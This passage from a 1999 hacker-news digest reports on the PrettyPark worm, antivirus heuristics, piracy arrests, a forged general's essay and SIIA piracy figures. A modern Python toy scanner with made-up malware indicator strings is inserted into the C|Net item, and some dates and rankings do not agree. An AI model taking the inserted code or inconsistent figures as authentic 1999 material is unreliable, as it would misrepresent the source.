Panda said PrettyPark attempts to connect to an Internet relay chat server from a list of 13 possible servers, then send a message to a chat user — enabling the author of the virus to gather data on and monitor affected workstations. PrettyPark can then be manipulated as a Trojan horse, Panda said, to obtain data such as the list of available disks and confidential information such as logins and Internet connection passwords.

Panda Software U.S. executive director Pedro Bustamante said Friday his company had replicated the “potentially high risk” worm/Trojan in its European anti-virus lab. “It could potentially be very high risk,” Bustamante said. “The interesting thing about this new Trojan is that, unlike Melissa, it doesn’t send itself once; it sends itself every 30 seconds.”

Trend/Micro, Symantec and Network Associates reported Friday that they have been unable to duplicate PrettyPark. In a virus alert, Network Associates said PrettyPark was low risk.

Trend/Micro director of technology Dan Schrader said the anti-virus company’s customers reported PrettyPark’s auto-spamming, but “can’t confirm the auto-spamming function.”

“We’ve seen 40 incidents in the last 48 hours. All the incidents so far have been in France,” said Schrader, adding that PrettyPark was similar to the notorious Happy 99 executable that struck earlier this year.

Schrader said PrettyPark has the potential to spread widely — if it can in fact automatically send itself to everyone in a user’s address book. But, because Trend/Micro has been unable to replicate this auto-spam capability, and because it so far seems to be centered in France, Trend/Micro suspects that someone may have spread it by hand.

Symantec, Trend/Micro, Panda and Network Solutions have all posted anti-virus updates to cover PrettyPark.

Luke Reiter of CyberCrime contributed to this report.

@HWA

06.1 The rampage continues
     ~~~~~~~~~~~~~~~~~~~~~

     June 8th 1999
     From HNN http://www.hackernews.com/

     PrettyPark Continues its Rampage

     contributed by nvirb

     PrettyPark, the latest virus/trojan/worm, is quickly spreading around the world. The virus arrives as an email attachment. Then, after it is executed, it hides behind a screen saver to mail out copies of itself and to connect to an IRC channel. In a quote given to MSNBC, Steve Trilling of Symantec said, "This virus took months to write, and its creator put a great deal of effort into it."

MSNBC

PrettyPark hits Windows users hard
Victims of e-mail virus increase 2,000 percent over the weekend, Symantec reports
By Shauna Sampson, ZDTV
ZDNN

June 7 — PrettyPark, a French e-mail virus, got a tremendous boost from home PC users this weekend.
Anti-virus software maker Symantec said it has observed an increase of 2,000 percent in apparent victims since Friday.

These victims of the virus, which is being described as a worm with Trojan capabilities, are likely Microsoft Windows users who are being sent to a custom Internet relay chat channel without their knowledge. Once there, victims’ personal data — ranging from e-mail address book lists, operating system preferences and registration numbers, passwords, and form data (including stored credit card information) — can be potentially retrieved from the victim’s PC without their knowledge by the virus writer.

PrettyPark is the first known worm with Trojan capabilities and its very own custom IRC channel. “This virus took months to write, and its creator put a great deal of effort into it,” says Steve Trilling of Symantec.

Consumers are being hit harder by the virus because they are less likely to update their anti-virus software than large companies or businesses and are more likely to open and run executables sent by what appears to be family or friends.

The virus is spread when PC users open an attached e-mail program file named “PrettyPark.EXE”. When executed, it may display the Windows 3D pipe screen saver while it creates and sends duplicate files of itself to e-mail addresses listed in the user’s Internet address book. PrettyPark will run this routine every 30 seconds, without the user’s knowledge. It will also connect to the custom IRC channel while the PC owner is on the Internet or reading e-mail while connected to a remote server.

So far only Windows-based systems seem to be vulnerable; the virus is definitely spreading and anti-virus software manufacturers are expecting to see more victims in the IRC chat rooms. In order to protect themselves from PrettyPark and other viruses, PC users should update their anti-virus software and avoid opening e-mail attachments.

Researchers are trying to determine if other e-mail programs, such as Eudora and Lotus Notes, are vulnerable; presently the Mac and Linux operating systems do not seem to be affected.

     In a related story C|Net takes a look at the technology behind the Anti-Virus products available today.

     C|Net
     http://www.news.com/News/Item/0,4,37458,00.html

Battling the unknown virus
By Tim Clark
Staff Writer, CNET News.com
June 7, 1999, 1:35 p.m. PT

Antivirus software makers are recycling some old tricks to combat computer viruses proliferating over the Internet.

The technique, called "heuristics," checks for suspicious commands within software code to detect potential viruses. Heuristic techniques can detect new viruses never seen before, so they can keep malicious code from spreading. An older method, called signature-scanning, uses specific pieces of code to identify viruses.

Both methods have down sides. Heuristic techniques can trigger false alarms that flag virus-free code as suspicious. Signature-scanning requires that a user be infected by a virus before an antivirus researcher can create a patch--and the virus can spread in the meantime. Most antivirus vendors use both techniques.

"It's time for the industry as a whole to look at different approaches," said Roger Thompson, technical director of malicious code research at ICSA, a for-profit trade group for computer security vendors. "The time-honored method of signature scanning is a little worn and weary given new viruses coming out."

Aladdin Knowledge Systems, which just added heuristics-based technology to its line of antivirus technology, claims it can snare 85 percent of the new viruses without many false alarms.

The recent Melissa virus showed that heuristics are not foolproof, as some viruses slip through the antivirus screen and must be fought with the traditional methods. Melissa was a macro virus that spread quickly because it self-replicated, sending email from the infected machine to recipients in that user's address book. Melissa illustrates why macro viruses worry antivirus researchers.

"Melissa was trivial technically and important strategically," said ICSA's Thompson, mainly because it demonstrated the kinds of disruptions a computer virus can cause, he said.

"Macro viruses are easy to create and easy to modify," said Carey Nachenberg, chief researcher at Symantec's antivirus research center. To combat viruses like Melissa, heuristics are a must, he said.

Macros are a simple programming language used to build templates in Lotus Notes or Microsoft Excel. Because of their simplicity, they can be used to create macro viruses, said Chris Christiansen, security analyst at International Data Corporation.

"There are rumored to be numerous automated applications that automatically generate macro viruses," said Christiansen, saying they are available on Web sites used by malicious hackers. "An unsophisticated user could write a macro virus or take a corporate macro and corrupt it, then replace a legitimate macro."

Today antivirus researchers are closely watching another virus -- the Pretty Park virus, which is currently circulating in France -- that posts passwords and other identifying data to Internet chat sites. So far, it's a low level alert because its self-replicating function apparently doesn't work.

Overall, a higher percentage of macro viruses could be caught, said Aladdin chief technology officer Shimon Gruper, at the cost of more false alarms.

"Not everything gets caught, so you still need a rule to catch it," said Susan Orbuch, spokeswoman for Trend Micro. "When there was a lot of fear about Melissa variants, we quickly put together some heuristics to combat it."
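The trade-off the C|Net article describes (signatures catch only what has already been seen; heuristics catch variants but raise false alarms) can be shown with a toy scanner. This added example, not from the article or from any vendor's product, checks constructed sample files against a constructed byte signature and a constructed set of weighted behavioural indicators, so that a repacked variant evades the signature while a harmless tool trips the heuristic.

```python
"""Added example (not code from the HWA issue or the C|Net article).

Toy comparison of signature scanning and heuristic scanning.  The
signature, the indicator strings, their weights and the sample "files"
are all constructed for this example and describe no real malware."""

# Constructed signature database: an exact byte sequence an analyst
# extracted from a sample after it had already infected somebody.
SIGNATURES = {
    "Sample.Worm.A": b"\x8b\xec\x83\xc4\xf0CONSTRUCTED-SIG-A",
}

# Constructed heuristic: strings standing in for the "suspicious
# commands" a heuristic looks for (address-book access, IRC protocol
# commands, a self-copy routine, a screen-saver decoy), each weighted.
# No single indicator is damning; the combination is what gets scored.
INDICATORS = {
    b"ADDRESS_BOOK_READ": 3,
    b"COPY_SELF": 3,
    b"IRC PRIVMSG": 2,
    b"IRC NICK": 1,
    b"SCREENSAVER_SHOW": 1,
}
THRESHOLD = 6  # constructed; lower it and more variants (and more false alarms) are caught


def signature_scan(data: bytes):
    """Return the signature name if a known byte pattern is present, else None."""
    for name, pattern in SIGNATURES.items():
        if pattern in data:
            return name
    return None


def heuristic_scan(data: bytes):
    """Return (score, matched indicator names) for the weighted rule."""
    found = [ind for ind in INDICATORS if ind in data]
    score = sum(INDICATORS[ind] for ind in found)
    return score, [ind.decode() for ind in found]


def classify(data: bytes) -> dict:
    """Run both scanners and report their verdicts side by side."""
    sig = signature_scan(data)
    score, found = heuristic_scan(data)
    return {
        "signature": sig,
        "heuristic_score": score,
        "heuristic_hit": score >= THRESHOLD,
        "indicators": found,
    }


# Constructed sample "files": a fake executable header plus strings.
HEADER = b"MZ\x90\x00"
# The sample the analyst saw: carries every behaviour and the known bytes.
KNOWN_WORM = (HEADER + b"ADDRESS_BOOK_READ COPY_SELF IRC NICK IRC PRIVMSG "
              b"SCREENSAVER_SHOW " + SIGNATURES["Sample.Worm.A"])
# Same behaviour, rebuilt so the known byte pattern is gone.
VARIANT = HEADER + b"COPY_SELF ADDRESS_BOOK_READ IRC NICK IRC PRIVMSG "
# A plain chat client: speaks IRC and touches nothing else.
CHAT_CLIENT = HEADER + b"IRC NICK IRC PRIVMSG "
# An address-book sync tool that installs itself by copying its own
# executable: legitimate, but the heuristic alone cannot tell.
SYNC_TOOL = HEADER + b"ADDRESS_BOOK_READ COPY_SELF "

SAMPLES = {
    "known_worm": KNOWN_WORM,
    "variant": VARIANT,
    "chat_client": CHAT_CLIENT,
    "sync_tool": SYNC_TOOL,
}


def scan_all(samples=SAMPLES) -> dict:
    """Classify every sample; returns {sample name: verdict dict}."""
    return {name: classify(data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, v in scan_all().items():
        print(f"{name:12s} signature={str(v['signature']):14s} "
              f"heuristic={v['heuristic_hit']!s:5s} (score {v['heuristic_score']})")
```

The variant is the case the article calls the signature method's weakness, and the sync tool is the false alarm it attributes to heuristics; the usual answer is to run both and let a signature hit override the heuristic's uncertainty.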
@HWA

07.0 Eight Arrested in California
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 7th 1999
     From HNN http://www.hackernews.com/

     contributed by st1p3r

     15,000 mass produced pirated copies of Microsoft applications were confiscated and eight people were arrested during a raid in Southern California last Thursday. They have been indicted on 45 counts of counterfeiting, conspiracy and money laundering.

     Nando Times
     http://www.techserver.com/story/body/0,1634,56660-90472-643309-0,00.html

Microsoft program counterfeiters arrested

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

LOS ANGELES (June 5, 1999 5:12 p.m. EDT http://www.nandotimes.com) - Eight people have been arrested in a counterfeiting scheme that police said churned out 15,000 phony copies of Microsoft computer programs every month.

The Southern California residents were arrested Thursday, a day after being indicted on 45 counts of counterfeiting, conspiracy and money laundering. All are expected to enter pleas Monday.

Five other people also were named in the federal grand jury indictment, including three who were arrested in February and freed on bond, the U.S. attorney's office said Friday.

The ring pressed counterfeit CD-ROM disks of Windows 98 and other popular programs, printed bogus "certificates of authenticity" and then packaged and sold the disks overseas, authorities contend.

Authorities in February raided several warehouses and seized a room-sized CD-ROM replicator. Also seized were color printing presses, packaging machines and other counterfeit items that Microsoft officials estimated were worth about $56 million on the retail market.

@HWA

08.0 278 Internet Cafes Disciplined
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 7th 1999
     From HNN http://www.hackernews.com/

     contributed by Anonymous

     Public Action Number One has been launched jointly by the city of Shanghai, China's police force along with commercial, telecommunications and education authorities to standardize the city's public Internet cafes. Only 350 of the city's estimated 2000 internet cafes are authorized to do business. The crackdown has resulted in fines and warnings for many establishments that do not control users' forays into cyberspace.

     Nando Times
     http://www.techserver.com/noframes/story/0,2294,56247-89863-639407-0,00.html

Shanghai tightens hold on Internet cafes

Copyright © 1999 Nando Media
Copyright © 1999 Reuters News Service

SHANGHAI (June 4, 1999 12:11 p.m. EDT http://www.nandotimes.com) - Chinese boomtown Shanghai has disciplined 278 unregistered Internet cafes in a crackdown on uncontrolled forays into cyberspace, the official Liberation Daily reported on Friday.

The move was aimed at "standardizing the city's public Internet cafes" where customers can sip coffee and surf "the Net," the newspaper said.

A city government official said some of the unregistered cafes would be fined while others would be given a warning.

The crackdown, described as "Public Action Number One," was launched jointly by the city's police and commercial, telecommunications and education authorities.

Shanghai now has more than 2,000 Internet cafes but only 1,500 of them have applied to register and only 350 are authorized, the newspaper said.

Local authorities have tightened control of information vendors around the 10th anniversary of the Beijing crackdown on dissent on June 3-4, 1989, when the army shot its way into Tiananmen Square to end seven weeks of pro-democracy protests.

Late last month, Shanghai ordered local paging stations and computer information vendors to stop disseminating political news temporarily, including news downloaded from the Internet.

China has seen explosive growth in the use of the Internet in recent years but the government has also viewed it as a potential threat to its authority.

There are now an estimated two million Internet users in China and some experts predict the number of Web surfers could top 10 million by next year.
@HWA

09.0 Forbidden Knowledge Issue #5
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 7th 1999
     From HNN http://www.hackernews.com/

     contributed by Anonymous

     Issue Five of the increasingly improving Forbidden Knowledge e-zine has been released. It features articles on Memory and Addressing Protection in Multiuser Operating Systems and some other very interesting topics. Check it out at the main site or at Packetstorm.

     Forbidden Knowledge
     http://www.posthuman.za.net

@HWA

10.0 f41th Issue 6
     ~~~~~~~~~~~~~

     June 7th 1999
     From HNN http://www.hackernews.com/

     contributed by D4RKCYDE

     d4rkcyde has kept its work up and released issue 6 of the H/P ezine f41th. The zine contains good h/p technical information and is available almost twice a month. Back issues are available.

     Issue 6
     http://darkcyde.system7.org/files/faith/faith6.txt
     f41th

11.0 Antidote Vol2 Issue 7
     ~~~~~~~~~~~~~~~~~~~~~

     June 7th 1999
     From HNN http://www.hackernews.com/

     contributed by lordoak

     The newest issue of Antidote has been released with articles on PC Anywhere, Netscape, and much much more. Check it out.

     Antidote Vol2 Issue 7
     http://www.thepoison.org/antidote/issues/vol2/7.txt

12.0 Will the Allies Drop CyberBombs on Milosevic?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 8th 1999
     From HNN http://www.hackernews.com/

     contributed by erewhon

     A well researched, no FUD, article that goes against the normal hype and sensationalism. William Arkin backs up HNN's earlier assessment of last week's Newsweek reports of a cyber attack against the bank accounts of Milosevic. A previously unseen transcript of a conference from the Air Force Association has allowed the Washington Post to conclude that Yugoslavia's bank accounts are probably pretty safe. (It is a welcome change to see good journalism now and again.)

     Washington Post
     http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm

The Good News on Forgery

By William M.
Arkin Special to washingtonpost.com Monday, June 21, 1999 "The decade begun in Kuwait ends in the skies over Serbia. No American government will, in the near future at least, simply assume that it has the military power needed to impose its will...." Thus retired Gen. John M. Shalikashvili grumbles about the "difference between being the greatest ... power in the world and omnipotence" and warns of the emergence of a "passive" and "isolationist" America as a result of the war in Yugoslavia. "The United States will be withdrawing from its aggressive leadership position not solely because it wishes to," says the former Chairman of the Joint Chiefs of Staff. "It will be withdrawing because it has seriously lost the trust of many of its NATO allies." Why? Besides committing insufficient military power in Yugoslavia, the air war, he says, is "not going to force a Serbian capitulation." The Shalikashvili essay, "The World After Kosovo," began circulating via e-mail about three weeks before Belgrade's withdrawal from Kosovo. It is a forgery. "Someone has stolen my name," Shalikashvili told the Seattle Post-Intelligencer, which revealed the fabrication on the final day of Operation Allied Force. Stolen, and Forwarded "This has been a major embarrassment to me," says a West Point graduate, after he circulated the Shalikashvili essay to his classmates. Like many other military observers, he received the commentary via e-mail. "I innocently passed along the article that had been forwarded to me clearly marked as being written by Gen. Shali from a network of senior retired military officers – a normally credible source!" As compliments and complaints alike poured in from friends and former aides, General Shalikashvili, who retired in October 1997, discussed with Defense Department spokesman Ken Bacon whether the electronic screed should be denounced from the Pentagon podium. They decided not to bring attention to the fake. 
Then Shalikashvili got a call from Deputy Secretary of State Strobe Talbott, who was asked by Finnish President Marti Ahtisaari whether the article might not complicate negotiations with President Slobodan Milosevic. Shalikashvili decided to go public: "I was hoping that it would go away, but this thing doesn't seem to be dying," he says. Floss, Dance, Don't be Fooled I know what you're thinking: The Internet has struck again. Faster than a speeding bullet an individual's identity has been stolen. An irresponsible and unregulated medium has perpetrated fraud and deceit. We've seen this time and again with the Web: Disgraces like Pierre Salinger's flogging of "intelligence" documents dealing with the TWA Flight 800 accident that turn out to be nothing more than conspiratorial drivel plucked from the Web. The "Floss, Dance, Don't Be Fooled" MIT commencement address that wasn't delivered by Kurt Vonnegut. The Internet does indeed have the capacity to amplify and duplicate what is real, as well as what is not. Yet for all the copying and forwarding and quoting of Shalikashvili's impostor discourse amongst a cyber-savvy network of retired generals and veterans who increasingly use e-mail as a lifeline, what is interesting is that the comments never really circulated outside of closed community. A check of Web-wide discussion group search engines (Deja.com, AltaVista, Forum One, Remarq) found that the essay was never sent to a single newsgroup. On the Web, there is only a single posting: on the FreeRepublic site ("The Web's premier conservative news discussion forum!"). Even here, where the retired military officer who distributed the essay described it as "the story of the current JCS members who have been silenced by the White House intimidation machine," the piece was quickly rejected. The same day it was posted, May 28, three participants identified the work as fraudulent. The system works! A Good Day for Bombing "The World After Kosovo" is a very good forgery. 
There is no obvious inflammatory language; it is a plausible viewpoint that someone could associate with a retired high-ranking officer. The news media, like the Web, proved less promiscuous than its popular reputation in running with the supposed dissent. When Pulitzer Prize-winning reporter Seymour Hersh received the e-mail from a recently retired two-star general, he was also warned that it may or may not be authentic. Hersh read the words with interest, but he says he would never have done anything with the file, including forwarding it, without contacting Shalikashvili first. Tom Ricks, the Pentagon correspondent for the Wall Street Journal, also received the Shalikashvili piece, in spades. "About 50 military officers credulously forwarded the 'Shali piece' to me," Ricks says. Ricks's newspaper made itself famous in January when it quoted from the e-mail of an Air Force general bragging about the bombing of Iraq. "It's a good day for bombing," the officer wrote. But after his utterances proved fair game for the mainstream media, the general, tail fin between his legs, told the Journal that he probably should have chosen his words better. E-mail has since proven a nettlesome medium for the closed world of retired and active duty officers. But before the Internet gets the blame, it should be made clear that the Shalikashvili episode is an embarrassment for a network of otherwise worldly military specialists who were fooled by the prose and perhaps even blinded by their own anti-Clinton animus. Though many questioned the authenticity of the retired general's words, they copied and forwarded the essay, Drudge-style. It was hardly a precision military formation. William M. 
Arkin can be reached for comment at william_arkin@washingtonpost.com © Copyright 1999 The Washington Post Company @HWA 13.0 Melissa Suspect Still not Charged ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 8th 1999 From HNN http://www.hackernews.com/ contributed by Scores Still free on $100,000 bail, David L. Smith has still not been officially charged with a crime. He has been accused of spreading the Melissa virus which rampaged through the country's computer networks within days of its release. A spokesperson for the defense claimed that they are just waiting on the DA. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2271206,00.html @HWA 14.0 ToorCon '99 Security Expo ~~~~~~~~~~~~~~~~~~~~~~~~~ DATE HAS CHANGED FOR THIS EVENT SEE SECTION 95.0 June 8th 1999 From HNN http://www.hackernews.com/ contributed by h1kari ToorCon will be held on August 7-8 in San Diego, California. It is being billed as a computer security convention hosted by the San Diego 2600 Meeting to help educate and inform the public on computer security related matters. ToorCon will feature: Speakers, Lectures, Hands-on Demonstrations, InstallFests, Root Contests, and raffles. HNN Cons Page http://www.hackernews.com/cons/cons.html @HWA 15.0 ISS Gets Free Advertising ~~~~~~~~~~~~~~~~~~~~~~~~~ June 8th 1999 From HNN http://www.hackernews.com/ contributed by lamer Here's a nice 'adverticle' for ISS. ISS must be really wonderful because they have "tangled" with cDc, that horrible hacker group that makes Microsoft's life "miserable". I don't suppose it's possible that MS makes its own life miserable by putting out 3rd rate software? Nah. And I don't suppose it is possible that the author of this article did any research other than contacting ISS? Nah.
US News http://www.usnews.com/usnews/issue/990614/14hack.htm @HWA 16.0 Accounting Firms also get Free Advertising ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 8th 1999 From HNN http://www.hackernews.com/ contributed by Even lamer Not to be outdone by ISS and the X-Force, Deloitte & Touche and PriceWaterhouse Coopers get their own adverticle detailing their joint venture, the new cyber-"fraud squads". C|Net http://www.news.com/News/Item/Textonly/0,25,37419,00.html Accounting firms fight cybercrime By Dan Goodin Staff Writer, CNET News.com June 7, 1999, 4 a.m. PT URL: http://www.news.com/News/Item/0,4,37419,00.html The dramatic growth in computer-perpetrated crime has not been lost on big accounting firms, which smell a growing profit center in helping clients protect themselves against online trespassers. In the past six months, both Deloitte & Touche and PriceWaterhouse Coopers have formed new cyber-"fraud squads" to investigate crimes and evaluate security systems. The other big accounting firms, as well as IBM and smaller private investigation outfits, are also jumping into the game. "We think there are significant unmet needs," said Bill Boni, director of Price Waterhouse's cybercrime investigations group, which was created earlier this year. "It's certainly going to be an area of interest for all the large accounting firms." The reason for the interest is simple: Incidents of fraud and other crime perpetrated online are on the rise. Putting a number on the increase is difficult, since many incidents go unreported. One of the most useful measuring sticks, however, comes from annual reports released by the Computer Security Institute, which surveys 521 security practitioners from corporations, banks, government agencies, and universities. Last year, 32 percent said they reported serious incidents to law enforcement agencies, nearly twice the number as three years ago.
Meanwhile, 55 percent said that company insiders gained unauthorized access to computer networks, and 30 percent reported intrusions by outsiders. The San Francisco-based group estimates that computer security breaches cost the respondents more than $123 million last year, and worldwide may cost businesses tens of billions of dollars, according to Richard Power, the organization's editorial director. "With the rise of the Internet and the transaction of e-commerce, corporations and government agencies are far more open to attack than ever before," Power told CNET News.com in an interview. "There are all kinds of new ways to make money through computer crime." That's where accounting firms come in. For a host of reasons, companies whose online security has been breached frequently prefer to take their problems to private investigators rather than law enforcement agencies. "Some [law enforcement agencies] have taken aggressive stances, but even in Silicon Valley you will find that most of the senior officials in police departments are not that sensitive to high-tech matters," said John O'Laughlin, director of worldwide security at Sun Microsystems. "Most of them are not up to speed in dealing with high-tech issues." Companies are also hesitant to go to authorities out of fear the matter will generate negative press. "Some of these companies don't want to admit that they've been compromised," said assistant U.S. attorney Chris Painter, who investigates high-tech crime. A benefit of taking a crime to private investigators is that companies can learn all the facts before deciding whether to take the matter to court. "They keep control of their information," said George Vinson, former head of the FBI's computer intrusion team in San Francisco and now practice leader for Deloitte & Touche's fraud and forensics team. "So many times [companies] are interested in settling something civilly rather than seeing it splashed on the A-1 page" of the local newspaper.
The bulk of Vinson's work so far has been investigating claims of copyright infringement. Typically, that means comparing the source code of a client's software against that of a suspected infringing copy. Vinson also investigates people suspected of using the Internet to manipulate a company's stock price and tracks employees who misappropriate a company's trade secrets. The accounting firms also assess clients' security systems to make sure they are not vulnerable to attacks. The work is similar to what Vinson did while at the FBI. In 1996 his group brought down more than 20 Internet users in 10 states who used chat groups to trade software titles made by companies such as Adobe and Microsoft. And with more and more companies transacting business online, the demand for computer forensics services is only expected to continue, said Sun's O'Laughlin. "I don't think there's any question the e-commerce is here to stay," he said. "You're going to see that it's pretty vulnerable to fraud and abuse and [companies] want to get ahead of the curve." @HWA 17.0 Analyzer Starts Computer Security Business ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 9th 1999 From HNN http://www.hackernews.com/ Analyzer Starts Computer Security Business contributed by Code Kid Analyzer (Eric Tenenbaum) is still awaiting the final outcome in his trial in Israel after he was accused of breaking into the Pentagon computer systems. While waiting he has teamed up with three college students and hopes to raise 4.5 to 5 million dollars to create a security software package. 
Israel Business Globe http://www.globes.co.il/cgi-bin/Serve_Archive_Arena/pages/English/1.2.1.2/19990607/1 Tuesday, Jun 8, 1999 Exclusive: Analyzer Founds Computer Security Start-Up By Ronny Lifschitz Ehud Tenenbaum, known as the "Analyzer", still awaiting the commencement of hearings in his trial, following the exposure of his penetration of the Pentagon’s computers, is forming a computer security company. Tenenbaum’s partners are three students currently completing their studies in electronic engineering. The new company is negotiating with potential investors, and plans to raise $4.5-5 million for the purpose of developing a security software package that will be able to monitor hackers’ activities. The other partners are Sharon Shani, Gil Bar-Noy, who was chairman of the students’ negotiating team in the tuition fee battle with the government, and another student, who prefers to remain anonymous. At the beginning of 1998, the three set up Webber Communications, a company which engaged primarily in the construction of Internet sites and consultation to Internet companies. "Our idea is very innovative, and is based on the hacker’s point of view", Tenenbaum explains to "Globes". "Our product will be able to adapt itself to the hackers’ evolving methods, and upgrade itself". Tenenbaum refused to give details of the type of security software the company is to develop, but said that he and his partners, who served with the IDF Intelligence Corps, will set up an intelligence system to monitor the modus operandi of hackers the world over, and thus close the gap existing between security companies and hackers. The young entrepreneurs believe that many organisations will purchase their future product, including NASA and the Pentagon. See accompanying feature: Analyzer II.
Published by Israel's Business Arena June 7, 1999 @HWA 18.0 $2.9Bil in Piracy in The US ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 9th 1999 From HNN http://www.hackernews.com/ $2.9Bil in Piracy in The US contributed by Sinbad The Software Information & Industry Association has released a report that claims that the US is responsible for $2.9Bil worth of software piracy. The top ten cities alone represented $1Bil of that money. New York City was named the worst offending city with a piracy amount estimated at $259 million. It is kind of interesting how they come up with these numbers. Wired http://www.wired.com/news/news/business/story/20091.html Software Information & Industry Association http://www.siia.net/news/releases/piracy/6.8.99-Piracy-Release.htm Wired; ~~~~~~ Cities Singled Out for Piracy Wired News Report 4:15 p.m. 8.Jun.99.PDT Ten major metropolitan areas in the United States were responsible for more than US$1 billion in losses to software piracy in 1998, according to a study released today by the Software and Information Industry Association. New York, Los Angeles, and Chicago topped the list. Peter Beruk, vice president of the association's antipiracy program, said the cities were singled out because they feature the highest concentration of white-collar workers. The study estimated the losses for the New York metropolitan area to be $259 million, followed by that of Los Angeles with $159 million. Chicago was close behind with more than $112 million in losses. Beruk estimates that one in every four business software applications in use across the United States is an illegal copy. According to the SIIA report, the total loss throughout the US to software piracy in 1998 was $2.9 billion, a sizeable chunk of the $11 billion loss worldwide in 1998. 
- - - Brokers, beware: Online trades grew a record 47 percent to 500,000 a day in the first quarter, boosted by a strong stock market and the increasing appeal of Internet brokerages, an influential industry analyst said on Tuesday. "Online trading firms now appear to be penetrating the mass markets, not just the techno-philic early adopters," said analyst Bill Burnham, of securities firm Credit Suisse First Boston, in a research report. Almost 16 percent of all stock trades now take place in cyberspace, he added. "If the fourth quarter of 1998 was a record quarter for the industry, then the first quarter of 1999 was quite simply a complete blowout," Burnham said. Online trading grew at 34 percent to 340,000 a day between the third and fourth 1998 quarters. Online brokers, who two years ago handled, on average, just 95,500 trades a day, have been growing at a rapid pace, thanks in part to heavy advertising. Investors also keep flocking to Internet brokers because of low commissions -- an average $15.75 a trade -- and ease of use. The top five US Internet brokers -- Charles Schwab, ETrade Group, Waterhouse Securities, Datek Online, and Fidelity Investments -- had a 71.3 percent market share, up from 67.5 percent a year ago, Burnham said. ETrade and Ameritrade Holding, the No. 6 Internet broker, grew fastest in the first quarter, each processing at least 60 percent more trades than in the fourth quarter. - - - News Corp. invests in PlanetRx: PlanetRx.com, an online pharmacy, said Tuesday that it had raised an additional $50 million from private investors, including media company News Corp. News Corp. -- which owns companies such as 20th Century Fox, the Fox television network, and several newspapers around the world -- said PlanetRx.com's offerings would fit in with its plan to combine Fit TV, America's Health Network, and AHN.com into a new online health service. 
Other investors in this round of financing included ETrade, Tenet Healthcare, HealthSouth, and LVMH Group. The sizes of the individual investments weren't disclosed. PlanetRx.com plans to use the funding to advertise heavily, the company said. Reuters contributed to this report. Software Information & Industry Association; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ For Immediate Release Contact: Peter Beruk, VP, Anti-Piracy Programs, 202-452-1600, ext. 314, or pberuk@siia.net Keith Kupferschmid, Intellectual Property Counsel, 202-452-1600, ext. 327, or kkupfer@siia.net Software & Information Industry Association Unveils Top Ten “Most Wanted” Metro Areas For Software Piracy In United States Cities Responsible For More Than $1 Billion Of Software Piracy Losses In 1998 (June 8, 1999 - Washington, D.C.) - Ten major metropolitan areas in the United States were responsible for more than $1 billion of losses to software piracy in 1998, it was revealed today. The announcement was made by SPA, the anti-piracy division of the Software & Information Industry Association (SIIA), the largest trade association for the software code and information content industry. SPA unveiled its list of America’s “most wanted” metropolitan areas during the release of its 1999 Annual Global Piracy Report. The report estimates that a total of $2.9 billion was lost to software piracy throughout the United States during 1998, and that 85 countries were responsible for losses totaling $11 billion worldwide. Heading the SPA list was the New York metropolitan area, with an estimated $259 million of piracy losses in 1998. The Los Angeles metropolitan area was next with $159 million followed by Chicago with more than $112 million in losses. Other metropolitan areas on the list (in descending order of losses) were Washington-Baltimore, Boston-Nashua, San Francisco-Oakland, Philadelphia-Wilmington, Dallas-Fort Worth, Detroit-Ann Arbor, and Atlanta. 
A spokesperson for SPA said that the “Top Ten Most Wanted Metropolitan Areas” list would be released annually to highlight the seriousness of software piracy throughout the United States. “Software piracy is a crime. Our report, issued today, estimates that one in every four business software applications in use across the United States is an illegal copy. Knowingly or unknowingly, hundreds of companies are engaged in criminal activity every day, the moment their employees boot up their computers. This is unacceptable,” said Ken Wasch, president of SIIA. “For more than 10 years, SPA has led the fight against software piracy at home and abroad. By combining enforcement and education, we have been successful in reducing the rate of piracy in the United States from 48% when we began our anti-piracy program to an estimated 25% in 1998. But we do not intend to declare victory until software piracy is eliminated completely.” “Over the coming weeks, we plan to raise public awareness about the crime - and consequences - of software piracy. We want all Americans to understand that, regardless of whether the piracy is committed between friends and co-workers or by businesses or whether it is committed through illegal rental, counterfeiting or increasingly via the Internet, it affects more than just the largest software publishers. Of SIIA’s 1,400 member companies, 60% have annual revenues of less than $2 million. Software piracy can put those companies - and their employees - out of business and out of work within a matter of weeks. Through heightened enforcement and education efforts, we will drive this message home,” Wasch said. “Additionally, we will continue to work closely with the Department of Justice and the FBI in their continuing efforts to eliminate software piracy around the world. 
We applaud the recent statement by the Department of Justice that the FBI is working closely with law enforcement officials in other countries to combat computer crimes and enhance coordination and improve their combined capabilities.” The Software & Information Industry Association (SIIA) is the principal trade association of the software code and information content industry. SIIA represents more than 1,400 leading high-tech companies that develop and market software and electronic content for business, education, consumers and the Internet. Hundreds of these companies look to SIIA to protect their intellectual property around the world. Additional information on its anti-piracy program can be found at www.spa.org/piracy. To report software piracy, call (800) 388-7478. SIIA was formed on Jan. 1, 1999, as a result of the merger between the Software Publishers Association (SPA) and the Information Industry Association (IIA). Information on SIIA and its wide range of activities can be found at www.siia.net. Copies of the 1999 Global Piracy Report can be found at www.siia.net/news/releases/piracy/98globalpiracy.htm or by contacting David Phelps at 202-452-1600, ext. 320

The 1999 SPA “Ten Most Wanted Metropolitan Areas” List (based on revenue losses due to software piracy in 1998)

 1. New York-Northern NJ-Long Island - - $259,804,592
 2. Los Angeles-Anaheim-Riverside - - $159,572,768
 3. Chicago-Gary-Kenosha - - $112,201,219
 4. Washington-Baltimore - - $86,752,957
 5. Boston-Nashua - - $80,740,945
 6. San Francisco-Oakland - - $79,993,397
 7. Philadelphia-Wilmington - - $59,829,725
 8. Dallas-Fort Worth - - $62,080,995
 9. Detroit-Ann Arbor-Flint - - $61,379,449
10. Atlanta - - $50,479,623

